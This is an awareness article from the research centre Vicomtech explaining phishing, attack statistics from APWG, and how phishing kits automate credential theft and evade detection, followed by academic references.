What Is Phishing, and Why Is It So Dangerous?

Written by Vicomtech

Over the past few decades, Internet access has skyrocketed—from just 20% of the global population in 2005 to 67% in recent years [1]. That means 5.5 billion people are now online. With this massive expansion, protecting users and their data has become a growing concern for law enforcement agencies, researchers, and companies.

As more people connect to the digital world, the risks they face have increased as well. One of the most prevalent threats in this environment is phishing. Phishing is a type of fraud based on social engineering that aims to deceive users into revealing sensitive data—like login credentials or bank account information. Attackers often imitate the websites of well-known companies, prompting users to enter personal information.

Given the widespread adoption of the Internet, it is no surprise that phishing has evolved into one of the most common cyberattacks globally. The Anti-Phishing Working Group (APWG) reported 932,923 phishing attacks in Q3 of 2024 [2]. Social media platforms were the most targeted sector, accounting for 30.5%, followed by webmail with 21.2% of all phishing attacks.

According to APWG, about 74% of phishing attacks target financial institutions, SaaS platforms, webmail, social media, payment services, and e-commerce websites. This suggests that phishers carefully select high-value targets to increase their financial gain through mass attacks.

To effectively exploit these targets, attackers rely on well-crafted strategies to deceive users. Launching a phishing website involves two main steps: first, setting up a server that can host the attack (sometimes with an SSL certificate), and second, creating a URL and HTML content that mimics a trusted website.

Traditionally, phishing attacks required considerable manual effort and technical expertise, making them less accessible to inexperienced attackers. However, one of the most dangerous developments in recent years is phishing kits—pre-packaged tools that let attackers easily and quickly create phishing websites [3]. These kits include everything needed to deploy an attack: fake websites, scripts for collecting stolen data, and automation features that make phishing more effective and scalable.

What makes phishing kits particularly threatening is the range of built-in features designed to streamline data theft. Phishing kits often include features to save credentials: (i) as plain text, (ii) via emails sent to the attacker, or (iii) through web-based dashboards that show the stolen credentials. These features allow attackers to operate at scale with minimal effort.

Yes—and that’s part of what makes them so dangerous. Many kits use obfuscation techniques to make detection harder for researchers and authorities [4], as well as cloaking mechanisms that filter out unwanted traffic or redirect certain users [3]. These features allow phishing websites to stay online longer and evade traditional detection tools. In doing so, they change not just how attacks are carried out, but the entire phishing lifecycle.

Phishing is no longer a simple scam—it’s a highly automated, evolving crime enabler powered by tools like phishing kits. These kits allow attackers to move fast, hit hard, and avoid detection [5]. As phishing attacks become more targeted and sophisticated, the need for better detection methods and robust datasets grows more urgent.

If we want to stay ahead of cybercriminals, we need to understand their tools, build smarter defenses, and support ongoing research efforts. The fight against phishing isn’t just a technical challenge.

[1] – We Are Social, Digital 2025, 2025. URL: https://wearesocial.com/uk/blog/2025/02/digital-2025/, last accessed: April 29, 2025.
[2] – A.-P. W. Group, Phishing activity trends report 3 quarter, 2024. URL: https://apwg.org/trendsreports/, last accessed: March 5, 2025.
[3] – H. Bijmans, T. Booij, A. Schwedersky, A. Nedgabat, and R. van Wegberg, ‘‘Catching phishers by their bait: Investigating the Dutch phishing landscape through phishing kit detection,’’ in Proc. 30th USENIX Secur. Symp. (USENIX Secur.), 2021, pp. 3757–3774
[4] – A. A. Orunsolu and A. S. Sodiya, ‘‘An anti-phishing kit scheme for secure web transactions,’’ in Proc. 3rd Int. Conf. Inf. Syst. Secur. Privacy, Jan. 2017, pp. 15–24
[5] – Castaño, F., Fernañdez, E. F., Alaiz-Rodríguez, R., & Alegre, E. (2023). PhiKitA: Phishing kit attacks dataset for phishing websites identification. IEEE Access, 11, 40779-40789.